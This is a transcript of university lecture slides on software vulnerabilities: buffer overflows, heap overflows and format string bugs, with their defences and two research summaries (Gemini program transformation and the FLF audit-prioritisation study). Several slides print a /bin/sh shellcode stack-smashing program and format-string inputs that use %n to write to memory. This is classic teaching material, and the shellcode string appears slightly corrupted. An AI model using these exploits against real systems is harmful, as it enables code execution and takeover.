Software Vulnerabilities: Definition, Classification, and Prevention

Software Vulnerabilities: Definition, Classification, and Prevention
Reverse Engineering (Software Security)

Reverse Engineering (Software Security)
4/24/2017 Overview What are software vulnerabilities? Types of vulnerabilities Buffer Overflows Format String Vulnerabilities How to find these vulnerabilities and prevent them? Classes of software vulnerabilities Reverse Engineering (Software Security)

What Are Software Vulnerabilities?
A software vulnerability is an instance of a fault in the specification, development, or configuration of software such that its execution can violate the (implicit or explicit) security policy. Reverse Engineering (Software Security)

Types of Software Vulnerabilities
Buffer overflows Smash the stack Overflows in setuid regions Heap overflows Format string vulnerabilities Reverse Engineering (Software Security)

Definition, Examples, and Defenses
Buffer Overflows Definition, Examples, and Defenses Reverse Engineering (Software Security)

What is a Buffer? Example: A place on a form to fill in last name where each character has one box. “Buffer” is used loosely to refer to any area of memory where more than on piece of data is stored. Reverse Engineering (Software Security)

Buffer Overflows [5] The most common form of security vulnerability in the last 10 years 1998: 2 out of 5 “remote to local” attacks in Lincoln Labs Intrusion Detection Evaluation were buffer overflows. 1998: 9 out of 13 CERT advisories involved buffer overflows. 1999: at least 50% of CERT advisories involved buffer overflows. Reverse Engineering (Software Security)

How Does a Buffer Overflow Happen?
Reading or writing past the end of the buffer  overflow As a result, any data that is allocated near the buffer can be read and potentially modified (overwritten) A password flag can be modified to log in as someone else. A return address can be overwritten so that it jumps to arbitrary code that the attacker injected (smash the stack)  attacker can control the host. Reverse Engineering (Software Security)

Two Steps Arrange for suitable code to be available in the program’s address space (buffer) Inject the code Use code that is already in the program Overflow the buffer so that the program jumps to that code. Reverse Engineering (Software Security)

Inject the Code Use a string as input to the program which is then stored in a buffer. String contains bytes that are native CPU instructions for attacked platform. Buffer can be located on the stack, heap, or in static data area. Reverse Engineering (Software Security)

Code Already in Program
Only need to parameterize the code and cause the program to jump to it. Example: Code in libc that executes “exec(arg)”, where arg is a string pointer argument, can be used to point to “/bin/sh” and jump to appropriate instructions in libc library. Reverse Engineering (Software Security)

Jump to Attack Code Activation record stack smashing attack Function pointer Longjpm(3) buffer Reverse Engineering (Software Security)

Memory Regions [4] Reverse Engineering (Software Security)

Code/text Segment Static Contains code (instructions) and read-only data Corresponds to text section of executable file If attempt to write to this region  segmentation violation Reverse Engineering (Software Security)

Data Segment Permanent data with statically known size Both initiated and uninitiated variables Corresponds to the data-bss sections of the executable file brk(2) system call can change data segment size Not enough available memory  process is blocked and rescheduled with larger memory Reverse Engineering (Software Security)

Heap Dynamic memory allocation malloc() in C and new in C++  More flexibility More stable data storage – memory allocated in the heap remains in existence for the duration of a program Data with unknown lifetime – global (storage class external) and static variables Reverse Engineering (Software Security)

Stack – I [3] Provides high-level abstraction Allocates local variables when a function gets called (with known lifetime) Passes parameters to functions Returns values from functions Push/Pop operations (LIFO) – implemented by CPU Size – dynamically adjusted by kernel at runtime Reverse Engineering (Software Security)

Stack – II Stack Pointer (SP) – TOP of stack (or next free available address) Fixed address – BOTTOM of stack Logical Stack Frame (SF) – contains parameters to functions, local variables, data to recover previous SF (e.g: instruction pointer at time of function call) Frame Pointer (FP)/local Base Pointer (BP) – Beginning of Activation Record (AR), used for referencing local variables and parameters (accessed as offsets from BP) Reverse Engineering (Software Security)

Activation Record [5] Contains all info local to a single invocation of a procedure Return address Arguments Return value Local variables Temp data Other control info Reverse Engineering (Software Security)

Accessing an Activation Record (AR)
Base pointer: beginning of AR Arguments are accessed as offsets from bp Environment pointer: pointer to the most recent AR (usually a fixed offset from bp) Stack pointer: top of AR stack Temporaries are allocated on top on stack Reverse Engineering (Software Security)

When a Procedure is Called
Previous FP is saved SP is copied into FP  new FP SP advances to reserve space for local variables Upon procedure exit, the stack is cleaned up Reverse Engineering (Software Security)

Function Pointer Find a buffer adjacent to function pointer in stack, heap or static data area Overflow buffer to change the function pointer so it jumps to desired location Example: attack against superprobe program - Linux Reverse Engineering (Software Security)

Longjpm Buffer setjmp(buffer) to set a checkpoint longjmp(buffer) to go back to checkpoint Corrupt state of buffer so that longjmp(buffer) jumps to the attack code instead Reverse Engineering (Software Security)

Example pushl $3 pushl $2 pushl $1 call function pushl %ebp movl %esp,%ebp subl $20,%esp void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; } void main() { function(1,2,3); Reverse Engineering (Software Security)

Buffer Overflow Example
void main() { int x; x = 0; function(1,2,3); x = 1; printf("%d\n",x); } void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; ret = buffer1 + 12; (*ret) += 8; } Reverse Engineering (Software Security)

Result of Program Output: 0 Return address has been modified and the flow of execution has been changed All we need to do is place the code that we are trying to execute in the buffer we are overflowing, and modify the return address so it points back to buffer Reverse Engineering (Software Security)

Example [6] char shellcode[ ] = “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b” “\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd” “x80\xe8\xdc\xff\xff\xff/bin/sh”; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; /* long_ptr takes the address of large_string */ /* large_string’s first 32 bytes are filled with the address of buffer */ for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; /* copy the contents of shellcode into large_string */ for (i = 0; i < strlen(shellcode); i++) large_string[ i ] = shellcode[ i ]; /* buffer gets the shellcode and 32 pointers back to itself */ strcpy(buffer, large_string); } Reverse Engineering (Software Security)

Example Illustrated [6]
Process Address Space argc user stack RA sfp long_ptr i buffer large_string[128] Shellcode[] heap bss Reverse Engineering (Software Security)

Buffer Overflows Defenses
Writing correct code (good programming practices) Debugging Tools Non-executable buffers Array bounds checking Code pointer integrity checking (e.g., StackGuard) Reverse Engineering (Software Security)

Problems with C Some C functions are problematic Static size buffers Do not have built-in bounds checking While loops Read one character at a time from user input until end of line or end of file No explicit checks for overflows Reverse Engineering (Software Security)

Some Problematic C Functions [2]
Severity Solution: Use gets Most Risky fgets(buf, size, stdin) strcpy, strcat Very Risky strncpy, strncat sprintf, vsprintf snprintf, vsnprintf or precision specifiers scanf family precision specifiers or do own parsing realpath, syslog Very Risky (depending on implementation) Maxpathlen and manual checks getopt, getopt_long, getpass Truncate string inputs to reasonable size Reverse Engineering (Software Security)

Good Programming Practices – I
DO NOT USE: Instead USE: void main( ) { char buf [40]; gets(buf); } fgets(buf,40,stdin); Reverse Engineering (Software Security)

Good Programming Practices – II
DO NOT USE: Instead USE: void main() { char buf[4]; char src[8] = "rrrrr"; strcpy(buf,src); } if (src_size >= buf_size) { cout<< "error"; return(1); else { OR strncpy(buf,src,buf_size - 1); buf[buf_size - 1] = '\0'; Reverse Engineering (Software Security)

Debugging Tools More advanced debugging tools Fault injection tools – inject deliberate buffer overflow faults at random to search for vulnerabilities Static analysis tools – detect overflows Can only minimize the number of overflow vulnerabilities but cannot provide total assurance Reverse Engineering (Software Security)

Non-executable Buffers [7,8]
Make data segment of program’s address space non-executable  attacker can’t execute code injected into input buffer (compromise between security and compatibility) Reverse Engineering (Software Security)

Non-executable Buffers [7,8]
If code already in program, attacks can bypass this defense method Kernel patches (Linux and Solaris) – make stack segment non-executable and preserve most program compatibility Reverse Engineering (Software Security)

Array Bounds Checking Attempts to prevent overflow of code pointers All reads and writes to arrays need to be checked to make sure they are within bounds (check most array references) Campaq C compiler Jones & Kelly array bound checking Purify memory access checking Type-safe languages (e.g., Java) Reverse Engineering (Software Security)

Code Pointer Integrity Checking
Attempts to detect that a code pointer has been corrupted before it is de-referenced Overflows that affect program state components other than code pointer will succeed Offers advantages in performance, compatibility with existing code and implementation effort Hand-coded stack introspection StackGuard  PointGuard Reverse Engineering (Software Security)

StackGuard Compiler technique that provides protection by checking the return address in AR When detects an attack  causes app to exit, rather than yielding control to attacker Terminator canary Random canary Reverse Engineering (Software Security)

Heap Overflows Harder to exploit, yet still common Need to know which variables are security critical Cause a buffer overflow to overwrite the target variables (generally buffer needs to have lower address) Reverse Engineering (Software Security)

Example void main(int argc, char **argv) { char *super_user = (char *)malloc(sizeof(char)*9); char *str = (char *)malloc(sizeof(char)*4); char *tmp; super_user = super_user - 40; strcpy(super_user, "viega"); if (argc > 1) strcpy(str, argv[1]); else strcpy(str,"xyz"); tmp = str; while(tmp <= super_user + 12) { printf("%p: %c (0x%x)\n", tmp, isprint(*tmp) ? *tmp : '?', (unsigned int)(*tmp)); tmp+=1; } } Reverse Engineering (Software Security)

Output Reverse Engineering (Software Security)

Output After Overflow Reverse Engineering (Software Security)

Format String Vulnerabilities I [9]
Caused by design misfeatures in the C standard library combined with problematic implementation (bad programming habits!) printf family (syslog, printf, fprintf, sprintf, and snprintf): format string tells the function the type and sequence of arguments to pop and the format for output Hostile input can be passed directly as the format string for calls to printf functions Reverse Engineering (Software Security)

Format String Vulnerabilities II
Attacker can write arbitrary values to (almost any) arbitrary addresses in memory Overwrite a stored UID for a program that drops and elevates privileges Overwrite an executed command Overwrite a return address so it points to a buffer with shell code in it  OWN the program Reverse Engineering (Software Security)

Format String – By Example fmtme.c
int main(int argc, char **argv) { char buf[100]; int x; if(argc != 2) exit(1); x = 1; snprintf(buf, sizeof buf, argv[1]); buf[sizeof buf - 1] = 0; printf("buffer (%d): %s\n", strlen(buf), buf); printf("x is %d/%#x %p)\n", x, x, &x); return 0; } Reverse Engineering (Software Security)

Stack Layout of Program
When snprintf function is called: Reverse Engineering (Software Security)

Exploiting the Program I
Test 1: % ./fmtme "hello world“ buffer (11): hello world x is 1/0x1 Reverse Engineering (Software Security)

Exploiting the Program II
Test 2: print integers on stack above format string % ./fmtme "%x %x %x %x“ buffer (15): 1 f x is 1/0x1 4 values of output: the variable x and three 4-byte integers taken from the uninitialized buf variable Reverse Engineering (Software Security)

Exploiting the Program III
Test 3: control the values stored in the buffer % ./fmtme "aaaa %x %x“ buffer (15): aaaa x is 1/0x1 The 4 'a' characters we provided were copied to the start of the buffer and interpreted by snprintf as an integer argument with the value 0x ('a' is 0x61 in ASCII) Reverse Engineering (Software Security)

Exploiting the Program V
Test 4: % ./fmtme "\x58\x74\x04\x08%d%n" buffer (5): X1 x is 5/x05 Reverse Engineering (Software Security)

Exploiting the Program V (contd.)
snprintf copies the first 4 bytes into buf, scans the "%d" format and prints out the value of x, and reaches the "%n" directive Pulls the next value off the stack, which comes from the first 4 bytes of buf. These 4 bytes have just been filled with "\x58\x74\x04\x08", or, 0x Writes amount of bytes output so far, 5, into this address Reverse Engineering (Software Security)

Solutions Remove the %n feature Permit Only Static Format Strings Count the Arguments to printf FormatGuard Reverse Engineering (Software Security)

References [1] [2] Building Secure Software, Viega and McGraw [3] Smashing the Stack for Fun and Profit, Aleph One [4] Stony Brook State University of New York ( Reverse Engineering (Software Security)

References [5] Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade ( [6] [7] Reverse Engineering (Software Security)

References [8] [9] Format String Attacks, Tim Newsham, Guardent, Inc. 2000 Reverse Engineering (Software Security)

Other Useful Resources
"How to Write Buffer Overflows" by "Mudge“, 1997 "Stack Smashing Vulnerabilities in the UNIX Operating System" by Nathan P. Smith, 1997 "The Tao of Windows Buffer Overflows" by "DilDog“, 1998 Reverse Engineering (Software Security)

Gemini: Using Program Transformation to Secure C Programs Against Buffer Overflows Reverse Engineering (Software Security)

Overview Motivation TXL Transformation process Case study results Conclusion & future work Reverse Engineering (Software Security)

Motivation Stack buffer overflows most common security vulnerability found in C code The most popular , web and DNS software is open-source C code Stack buffer overflows approx. account for 50% of security vulnerabilities since 1997 Reverse Engineering (Software Security)

Motivation Stack Buffer Overflows: Strings grow opposite of stack Return address is above strings in memory Overwriting a string can overwrite return address Prevention Transforming local arrays to “pointer-to-arrays” in a way that: Relieves the need for programmer intervention Relieves the need for specific compilers Minimizes run-time overhead Reverse Engineering (Software Security)

Stack Buffer Overflows
4/24/2017 Stack Buffer Overflows void func(char *str1, char *str2) { char buf[80] ; … strcpy(buf, str1) ; } Strings grow opposite of stack Security critical return address is above strings in memory Overwriting a string can overwrite return address Reverse Engineering (Software Security)

In a Nutshell Transform every array that occurs in a function to a pointer Preserve the original semantics Both good and bad (where possible) Pointer arithmetic should still work Returning de-allocated memory should still work Reverse Engineering (Software Security)

In a Nutshell Array  Pointer-to-Array Reverse Engineering (Software Security)

TXL Text transformation tool Provide TXL with an EBNF grammar, a set of transformations for that grammar and input text Generates scanner and parser at run-time After applying transformations, outputs resulting text Strongly typed Guarantees Syntactic equivalence, but not semantic equivalence Reverse Engineering (Software Security)

TXL Reverse Engineering (Software Security) [2001 J. Cordy]

4/24/2017 TXL example Objective Replace occurrences of strcpy(s1, s2)by strncpy(s1, s2, sizeof(s1)) TXL Rule rule fixStrcpy Declarations [repeat compound_statement_body] replace $ [postfix_expression] strcpy '( ToBuf [unary_expression] ', FromBuf [argument_expression] ') where not Declarations [checkPointer ToBuf] by strncpy '( ToBuf ', FromBuf ', sizeof ToBuf ') end rule Reverse Engineering (Software Security)

A Parse Tree #include <stdio.h> #include <string.h> void main(int argc, char **argv) { char foo[5]; char *ptr = strcpy(foo, argv[0]); printf("%s\n", ptr); } Reverse Engineering (Software Security)

TXL Transformation Assumptions Globals, pointers, static and extern variables are not vulnerable to stack buffer overflows We will only be given compileable C code This is sometimes not the case with systems that use the autoconf package Transformation Steps: Declaration expansion typedef Flattening Declaration Transformation sizeof Alias Declarations Add free and Transform return and sizeof Initialization Functions Reverse Engineering (Software Security)

1. Declaration expansion
Makes transformation process easier Reverse Engineering (Software Security)

2. typedef Flattening Removes type aliases Distributes aliased array dimensions Provides a way to differentiate statements from declarations C is ambiguous about declarations and statements Reverse Engineering (Software Security)

Declaration/Statement Ambiguity
void main() { typedef char buf[5]; buf (s); printf (s); } This ambiguity makes some pre-processing impossible Reverse Engineering (Software Security)

3. Declaration Transformation
Pre-process Variable Declarations Adding parentheses around a declarator doesn’t change the semantics, but it does change the syntax Remove extraneous parentheses Simplifies declarations Groups array dimensions Transform Arrays to Pointers Generate Pointer Initialization Reverse Engineering (Software Security)

A. Pre-process Variable Declarations
Ambiguity: parsing declarations buf(s); and printf(s); can result in the same parse tree Flatten typedef Remove extraneous parentheses Reverse Engineering (Software Security)

B. Transform Arrays to Pointers
Transform array declarations to “pointer to array” Create an initialization functions to each array Create temporary variables to hold the original array sizes In ISO C99, array sizes can be variable sized (an expression) Reverse Engineering (Software Security)

C. Generate Pointer Initialization
Replace the declaration with a pointer to an array, removing the initializer Pointer Initialization function: Generate a new declaration with a unique name, and the same initializer Create a function which contains calloc and memcpy Reverse Engineering (Software Security)

4. sizeof Alias Declarations
sizeof allows for expressions, not just types Memory assigned to pointer is architecture dependent, always constant Violates semantic preservation Transform Arrays to Pointers Output= 80 Output= 4  Reverse Engineering (Software Security)

sizeof Alias Declarations
Generate new declaration with original array dimensions to replace all sizeof references Reverse Engineering (Software Security)

5. Add free and Transform return and sizeof
Fix return statements and insert free statements A return may reference a transformed array: If necessary, store expression in temporary variable, insert free statements for current scope, return temporary variable 3 cases End of scope without a return statement return with an expression return without an expression Reverse Engineering (Software Security)

Add free and Transform return and sizeof
Fix return statements and insert free statements Fix sizeof constants Reverse Engineering (Software Security)

6. Insert Initialization Functions
Functions inserted at bottom of file, prototypes at top Type flattening step removes possibility of a user defined type occurring in prototype, before actual declaration Reverse Engineering (Software Security)

Case Study Results (Most Recent)
4/24/2017 Case Study Results (Most Recent) Program Arrays Fixed (KLoC) Time Increase ( run-time) Regression Passed apache 226 (~94) 11.1% (0.001s) N/A bind 2408 (~298) 0.5% (2.690s) Yes bison 56 (~21) 1.8% (0.458s) find 47 (~17) 0% (0.000s) flex 29 (~18) openssh 513 (~56) 4.3% (7.233s) which 2 (~2) whois 7 (~1) 32.4% (.153s) All measurements are medians, not averages. Reverse Engineering (Software Security)

Conclusions and Future work
Limitations & Future work: Extends transformation algorithm for struct declarations: Arrays of structs (done) Arrays within structs (done) Benefits Current and future stack overflow attacks are guaranteed to fail when used against a transformed program Reverse Engineering (Software Security)

4/24/2017 Characterizing the ‘Security Vulnerability Likelihood’ of Software Functions Introduce yourself Software Engineering Research Group at Drexel University The paper was published in the IEEE conference on Software Maintenance (ICSM) this year(2003) “Characterizing the ‘Security Vulnerability Likelihood’ of Software Functions” Reverse Engineering (Software Security)

4/24/2017 Talk Outline Section I Manager/director detail Why are we here? Section II User detail What can we do? Section III Scientist detail How do we do it? Talk structured differently Three sections Each section provides a little more detail into the research done for the paper The sections are targeted towards different types of people Sections Why is our research and tools important What can our research and tools do to improve the security posture of a software system Research details Reverse Engineering (Software Security)

What is a Software Security Vulnerability?
4/24/2017 What is a Software Security Vulnerability? A software security vulnerability is a fault in the specification, implementation, or configuration of a software system whose execution can violate an explicit or implicit security policy. An explicit security policy is one which require design decisions (e.g. user authentication system). An implicit security policy is one which did not require design decision. An example of an explicit policy would be that a piece of software would not result in other users not being able to use the server. Reverse Engineering (Software Security)

4/24/2017 Section I Manager level detail Software vulnerabilities are a problem; how can we avoid them? Software vulnerabilities, particularly in the buffer overflow context are common occurrences. Software vulnerabilities cost industry millions of dollars every year. Why do they happen and how do we prevent them? Reverse Engineering (Software Security)

How are software security vulnerabilities avoided?
4/24/2017 How are software security vulnerabilities avoided? Safe programming languages Type safe languages Adequate software design Security Policies Thorough testing Testing with a high percentage of code coverage Security auditing Design Implementation Safe programming languages Type safe languages which specifically do dynamic checking curtail buffer overflows, the most common vulnerability. This vulnerability will be described later. Virtual machines allow a potential DMZ which allows for monitored access to the system. Safe functions ( mlock(): mlock specifies to the UNIX kernel that this memory should not be swapped to disk) Software Design Accurately designed security policies allow software engineers to make proper design decision in respect to the complete system. Operating systems with process space protection. Implementations which reflect security policies. Thorough testing Test cases which exercise a high amount of code is likely to reveal bugs which could turn into security vulnerabilities. Security Auditing By analyzing the security policies and understanding software design at a high level allows auditors to ask critical questions about the software. Once the questions have been formulated the code can be inspected to ensure security policies are correctly maintained and check code for flaws. Notes: -A more general definition is that no operation will be applied to a variable of a wrong type. There are additionally two flavors of type safety: static and dynamic. If you say that a program is type safe, then you are commenting on static type safety. That is, the program will not have type errors when it runs. You can also say that a language or language implementation is type safe, which is a comment on dynamic type safety. Such a language or implementation will halt before attempting any invalid operation. Reverse Engineering (Software Security)

Auditing for Software Security
4/24/2017 Auditing for Software Security Pre-release software development practices unlikely to change Safe languages Adequate software design Thorough testing Post-release auditing typically used if warranted Due to economic motivations and software development purposes the pre-release process is unlikely to change. If there is reason to believe that software has security issues, a security audit may be performed. If we can reduce the cost and efficiency of audits, developers may be more inclined to use them for preventative measures. Reverse Engineering (Software Security)

Security Auditing Issues
4/24/2017 Security Auditing Issues Large scale auditing infeasible due code size Good source code will have 1-3 bugs for every 100 lines of code [Beizer] Security Auditors need to find the software security vulnerabilities in the bugs Security audits would benefit from a tool that identify areas that are likely vulnerable Due to the code size of large scale systems, auditing is infeasible. Therefore auditors must use their expertise to find areas which could pose a problem. If the system is poorly documented, has been maintained poorly, or gone through a period of rapid feature development auditing becomes a problem of reverse engineering. Bezier states that for every hundred lines of code in good code there will be 1 to 3 bugs. If the bugs do not violate an explicit or implicit security policy it is not a security vulnerability and therefore of no concern to a security auditor. Locating security vulnerabilities is a task that requires a lot of manual code browsing and flow tracing. Security audits would benefit financially, temporally, and rigorously from a tool which locates those areas of code which have been shown to be statistically more vulnerable. Reverse Engineering (Software Security)

Improving the Security Audit
4/24/2017 Improving the Security Audit Provide a tool built on statistical measurements Cut down the amount of code needed to be reviewed Ensure high degree of accuracy Bottom line: Complexity reduction Managers, why are we here? To address the problem of security vulnerabilities in code. This problem is going to be addressed with the tools based on sound research. Reduce the complexity (and thus the time and expense) of security auditing Manager/Director this research and tools are aimed at improving software security by reducing the complexity of a software audit Reverse Engineering (Software Security)

4/24/2017 Section II User level detail How can our tools and research help the security auditor? This section is geared toward a user who would use these tools during a security audit Reverse Engineering (Software Security)

4/24/2017 The FLF Hypothesis Our hypothesis is that a small percentage of functions near a source of input are more likely to contain software security vulnerabilities These functions are known as Front Line Functions Lets review the FLF hypothesis again. Those functions involved with user input are suspect. These functions constitute a small percentage of the entire system. At some point following the data provides little benefit from a security standpoint. We need to validate our hypothesis Input FLF FLF FLF Reverse Engineering (Software Security)

4/24/2017 Front Line Functions 60% Code Reduction No auditor time required High degree of accuracy Graph of functions in openBSD 3.1 Green function represent function with a high likelihood of vulnerability (Front Line Functions) A tool would simply list the suspect functions Reverse Engineering (Software Security)

Discovering the FLF measurement
Collect software systems with known vulnerabilities Perform detailed static analyses of software systems Calculate areas of likely vulnerability from information gathered during static analyses Build tools around these calculations Reverse Engineering (Software Security)

How are these tools used?
4/24/2017 How are these tools used? Run static analysis tools on source code A database of code facts is created The database is used to find the likely vulnerable functions The likely vulnerable functions are outputted and ranked by proximity to input source Lets do a case study to illustrate how these tools are used. Reverse Engineering (Software Security)

Case Study: OpenSSH Reverse Engineering (Software Security)
4/24/2017 Case Study: OpenSSH GOAL: FLF Finder identifies large percentage of modified functions Code that was not change between revisions PRIVELEGE SEPARATION: Between revision 3.1 and 3.2.3, OpenSSH went through changes that struggle to separate code that needed “root” access from code that did not need “root” access AFTER REV.: Code that implemented privilege separation BEFORE REV.: These are functions that were changed during the revision GOAL: The FLF Finder should find a large percentage of those functions that were changed This means that our findings agree with the security auditors of OpenSSH on what is a likely vulnerable function A security auditor could use our tools and methods to find those areas of code that are statistically likely to be vulnerable. 82% of changed functions identified by FLF Finder Reverse Engineering (Software Security)

Section III Scientist level detail What is the process for creating the likely vulnerable measurement How do we identify FLFs Reverse Engineering (Software Security)

The FLF Hypothesis (revisited)
4/24/2017 The FLF Hypothesis (revisited) Our hypothesis is that a small percentage of functions near a source of input are more likely to contain software security vulnerabilities These functions are known as Front Line Functions Lets review the FLF hypothesis again. Those functions involved with user input are suspect. These functions constitute a small percentage of the entire system. At some point following the data provides little benefit from a security standpoint. We need to validate our hypothesis Input FLF FLF FLF Reverse Engineering (Software Security)

Validating the FLF Hypothesis
4/24/2017 Validating the FLF Hypothesis Gather a set of vulnerable software systems (Experimental Systems). Perform experiments on these systems with static analysis tools (GAST-MP & SGA) Identify all functions which initiate user input transactions (Inputs) Identify all functions which are vulnerable (Targets) Calculate FLF Density (FLF Density) Test the FLF Density on a set of control systems (Verification) Create a tool that utilizes the FLF Density (FLF Finder). Using the scientific method we will verify the FLF hypothesis Observation of software engineering patterns allowed for the formulation of the FLF hypothesis Predictions were made that vulnerable functions should be found close to the source of user input This makes sense from a software engineering standpoint because developers tend to deal with input when it arrives Reverse Engineering (Software Security)

4/24/2017 Experimental Systems 30 open source systems 31 software security vulnerabilities Each system has a single patch file which addresses one security vulnerability Most recovered from Redhat’s source RPM distribution due to their incremental nature SINGLE PATCH FILE: If a certain piece of software had a security vulnerability introduced by an off by one error, then we would try to find the smallest patch which addressed this off by one error SINGLE PURPOSE PATCHES HARD TO FIND: Because most developers have a set of other bug fixes ready to be released when a security vulnerability is found, finding singular patch files which addressed security vulnerabilities was difficult SRPMS: Redhat has a certain system of incremental patches which were very useful Reverse Engineering (Software Security)

4/24/2017 Validating the FLF Hypothesis Gather a set of vulnerable software systems (Experimental Systems). Perform experiments on these systems with static analysis tools (GAST-MP & SGA) Identify all functions which initiate user input transactions (Inputs) Identify all functions which are vulnerable (Targets) Calculate FLF Density (FLF Density) Test the FLF Density on a set of control systems (Verification) Create a tool that utilizes the FLF Density (FLF Finder). I was the lead developer on this project, and thus these tools are the fruits of my labor Reverse Engineering (Software Security)

4/24/2017 GAST-MP & SGA GNU Abstract Syntax Tree Manipulation Program ( GAST-MP ) Source Code Analysis tool Operates on G++’s Abstract Syntax Tree (AST) AST can be outputted with the –fdump-tree-flag Creates a repository of code facts System Graph Analyzer ( SGA ) Operates on the code fact repository Identifies Inputs and Targets Performs invocation analysis Calculates FLF Density Analysis of Categorical Graphs GAST-MP: Builds a entity/relationship repository which can be queried SGA: System Graph Analyzer OPERATES ON REP: Queries the repository, to build internal graphs. FLOW ANALYSIS: These graphs can then be analyzed through flow analysis Because of the detail within the AST, our tools can perform analysis that typically is hard to do. Pointer aliasing Dataflow through function boundaries Reverse Engineering (Software Security)

4/24/2017 Validating the FLF Hypothesis Gather a set of vulnerable software systems (Experimental Systems). Perform experiments on these systems with static analysis tools (GAST-MP & SGA) Identify all functions which initiate user input transactions (Inputs) Identify all functions which are vulnerable (Targets) Calculate FLF Density (FLF Density) Test the FLF Density on a set of control systems (Verification) Create a tool that utilizes the FLF Density (FLF Finder). Reverse Engineering (Software Security)

4/24/2017 Finding Inputs An Input is a function which contains reads in external user input For example, read A list of external function calls were compiled to properly identify Inputs This list could be modified to contain application specific library calls 1. INPUT FUNCTIONS: These functions are functions like read, scanf, recv, and getopt coming from unistd.h, stdio.h, getopt.h, stdlib.h, socket.h Reverse Engineering (Software Security)

4/24/2017 Validating the FLF Hypothesis Gather a set of vulnerable software systems (Experimental Systems). Perform experiments on these systems with static analysis tools (GAST-MP & SGA) Identify all functions which initiate user input transactions (Inputs) Identify all functions which are vulnerable (Targets) Calculate FLF Density (FLF Density) Test the FLF Density on a set of control systems (Verification) Create a tool that utilizes the FLF Density (FLF Finder). Reverse Engineering (Software Security)

4/24/2017 Finding Targets A Target is any function that contains a known vulnerability Targets are found by matching code facts on subtractive lines in a patch file with code facts in the repository generated by GAST-MP --- channels.c 27 Feb :23: +++ channels.c 4 Mar :37: -146,7 +146,7 { Channel *c; - if (id < 0 || id > channels_alloc) { + if (id < 0 || id >= channels_alloc) { log("channel_lookup: %d: bad id", id); return NULL; } SUBTRACTIVE LINES: In this example, all the entities on the subtractive line would be noted as vulnerable. Therefore, the function which contains this subtractive line is a target. Reverse Engineering (Software Security)

4/24/2017 Validating the FLF Hypothesis Gather a set of vulnerable software systems (Experimental Systems). Perform experiments on these systems with static analysis tools (GAST-MP & SGA) Identify all functions which initiate user input transactions (Inputs) Identify all functions which are vulnerable (Targets) Calculate FLF Density (FLF Density) Test the FLF Density on a set of control systems (Verification) Create a tool that utilizes the FLF Density (FLF Finder). (READ) EXPERIMENTS: Steps 2-5 constitute an experiment that was prepared, automated, and run to validate our hypthesis. This will all be explained Reverse Engineering (Software Security)

4/24/2017 FLF Density Create entire call graph G Transform G in DAG Label Input and Target Nodes Calculate invocation paths between Input and Target combinations and measure length Calculate FLF Density by normalizing path length by function cardinality For each system choose the largest FLF Density The FLF Density represents those functions that handled data which was used in a security vulnerability Reverse Engineering (Software Security)

4/24/2017 Experimental Results The longest path is the longest achievable invocation path between an input and a target. NORMALIZING FACTOR: We choose function cardinality as a normal because, function cardinality seems to be an accurate representation of function complexity. When path lengths become larger it is an indication of functional complexity and therefore scaling by function cardinality gives a good metric. WHY NOT PATH LEGNTH: Other suggestions for a normal were longest path and average path. The longest path in a system is implicitly an outlier and therefore not a good normalizing factor. The average path length is a time consuming normalizing factor to compute Reverse Engineering (Software Security)

4/24/2017 Experimental Results Sample mean FLF Density 2.87% Therefore, a very small number of functions are actually likely to be vulnerable Standard deviation of 1.87% The FLF density was consistent across our experimental systems With 95% confidence the true mean is between 2.23% and 3.51% There is a high probability that our experimental density is close to the TRUE FLF Density CONFIDENCE: The 95% Confidence is important because the interval is very small Reverse Engineering (Software Security)

4/24/2017 Verification The FLF Density can be used as a conservative way to highlight those vulnerability functions which do not have known vulnerabilities FLF DENSITY CHECK: These three systems all had security vulnerabilities but were reserved to test the FLF Density Dhcpd was missed due to function pointers Reverse Engineering (Software Security)

FLF Finder FLF Density can say what areas of code are statistically likely to be vulnerable Automate tool to find these areas Targets are not provided – what do we do? Assume all functions are targets This extremely conservative assumption is still able to reduce 60% of code! Reverse Engineering (Software Security)

Conclusion There is credibility to the FLF hypothesis FLF Finder can pinpoint those areas of code which are statistically likely to be vulnerable 60% code reduction This will greatly improve the efficiency of security code auditors! Efficiency improvements make auditing more appealing to software developers Reverse Engineering (Software Security)

Software Vulnerabilities: Definition, Classification, and Prevention

Similar presentations

Presentation on theme: "Software Vulnerabilities: Definition, Classification, and Prevention"— Presentation transcript:

Similar presentations

About project

Feedback

Log in

Auth with social network:

Software Vulnerabilities: Definition, Classification, and Prevention

Similar presentations

Presentation on theme: "Software Vulnerabilities: Definition, Classification, and Prevention"— Presentation transcript:

Similar presentations

About project

Feedback